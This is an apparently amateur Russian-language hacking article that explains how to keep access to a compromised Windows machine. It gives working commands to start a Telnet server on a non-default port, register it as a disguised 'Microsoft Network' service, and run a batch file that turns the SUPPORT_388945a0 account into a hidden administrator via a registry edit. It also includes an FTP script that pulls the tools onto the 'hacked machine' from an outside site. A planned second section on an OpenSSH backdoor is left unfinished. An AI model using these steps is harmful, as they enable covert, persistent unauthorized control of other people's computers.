Нетрадиционные способы закрепиться на вин машине.

1h Интра.
Все знают как ставить удаленно радмин через консоль, способ конечно хороший, но впринципе можно обойтись
и без радмина, поэтому речь данной статьи пойдет о том как можно закрепиться на вин машине другим способом
и поднять на ней парочку самых нужных вам серверов :) Статья расчитана на тех у кого есть опыт работы в командной
строке винды.

2h Поехали !
Вот вы получили шел доступ к тачке которая постоянно онлайн и с широким каналом, а терять такой шел ой как
не хочеться поэтому приступим:
Многие знают что в винде есть такой сетевой демон Telnet, запуск которого по умолчанию отключен, можно конечно ,
его включить,но сначала надо сменить тип его запуска на auto(по дефолту disabled )
sc config tlntsvr start= auto
можно впринципе уже запускать Telnet сервер, но так как он по умолчанию будет висеть на 23 порту не есть гуд слишком
палевно так что конфигурируюм его так,
tlntadmn config port=1001 sec=-NTLM
где номер port'а должен быть до 1024, лучше неуказывать попсовые порты, дабы если вы укажете порт нетбиоса ,который например уже юзаеться из-за того, что юзер сиди помимо нета еще и в локалке ,то телнет сервер нестартанет
так как порт будет занят и придеться обломаться.
после конфигурации Telnet сервера запускаем его
net start Telnet
В принципе все уже готово осталось тока добавить нового админа, подрубиться и наслаждаться только что полученным шелом.


Все это конечно хорошо, но имя службы Telnet очень палевное, поэтому я решил рассмотреть
создание фейковой службы, которая запускает все тот же tlntsvr.exe под тем же или другим именем,
можно например создать копию tlntsvr.exe в той же папке (system32) с имнем system.exe или System без расширения,
так даже круче потому-что намного беспалевней чем tlntsvr.exe, кстати все службы запускаються с правами системы,
можно конечно заюзать любимое многими вирмейкерами имя svchost.exe, но так как в system32 уже есть такой бинарник,
то придеться грузить его из каконибудь другой папки.
Регистрация новой службы:
sc create "Microsoft Network" binpath= %windir%\system32\tlntsvr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Позволяет вашему компьютерам получать доступ к ресурсам сети Microsoft."

в binapth надо указать путь к самому tlntsvr.exe или его копии с другим именем, вообщем данным способом можно создавать свою службу которая будет грузить любой бинарник - это нам понадобиться чуть позже
сразу после создания нашей службы настраиваем телнет сервер с помошью tlntadmn как было описано выше,
все осталось тока запустить службу пишем net start "Имя службы какое вы указали в displayname"

net start "Служба доступа к сети Microsoft"

Так как все команды писать вручную или копипастить не лучший вариант, то создаем батник следующего содержания:

chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 1234 /add
net localgroup Администраторы SUPPORT_388945a0 /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsvr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Позволяет вашему компьютерам получать доступ к ресурсам сети Microsoft."
net start "Служба доступа к сети Microsoft"
tlntadmn config port=1001 sec=-NTLM

Пояснения к батнику:
chcp 1251 меняем кодовую страницу на 1251 так как батник написан не в дос кодировке
немного о SUPPORT_388945a0: это стандартная виндосовская учетка какая есть в xp prof и в 2003 server,
по дефолту она отключена,поэтому использовать ее имя дла нового админа будет наилучшим вариантом.
Так как при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав
рег файл следующего содержания:
Содержимое conf.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"SUPPORT_388945a0"=dword:00000000


В принципе можно не удалять и не создавать заново эту супортовскую учетку, а сделать так

net user SUPPORT_388945a0 1234
net localgroup Администраторы SUPPORT_388945a0 /add
net localgroup тут_суппорт SUPPORT_388945a0 /del

Чтобы загрузить наш батник и рег с какого-нибудь народовского сайта на взломанную машину пишем в консоли

cd %temp%
echo open ftp.narod.ru>sc.txt
echo login>>sc.txt
echo pass>>sc.txt
echo ascii>>sc.txt
echo get /files/r.bat>>sc.txt
echo get /files/conf.reg>>sc.txt
echo bye>>sc.txt
ftp -s:sc.txt

Все осталось тока выполнить наш батник r.bat и юзать взломанную тачку через телнет.
Плюсы и минусы поднятия Telnet сервера:
+ Если юзать виндосовский телнет клиент то будет работать автодополнение
+ Все есть в самой системе
+ Нет проблем с антивирусом
- Нет шифрования трафика
- Создаеться профиль пользователя под каким мы логинимся, но это поправимо см.в конце
- При подключении будет висеть процесс cmd.exe запущенный от имени supp.....
__________________________________________________ _________________________________________________

Ну вот мы и подошли ко второму способу забекдурить вин машину, а бекдурить мы будем ее как это не смешно
с помошью open ssh сервера
Начнем !
(имееться ввиду инсталяционный скрипт NSIS'а подправить )
.................
__________________________________________________ __________________________________________________


Writed by Null
Извините недописал статью , пока что времени нет .

http://0xff.by.ru/bd.txt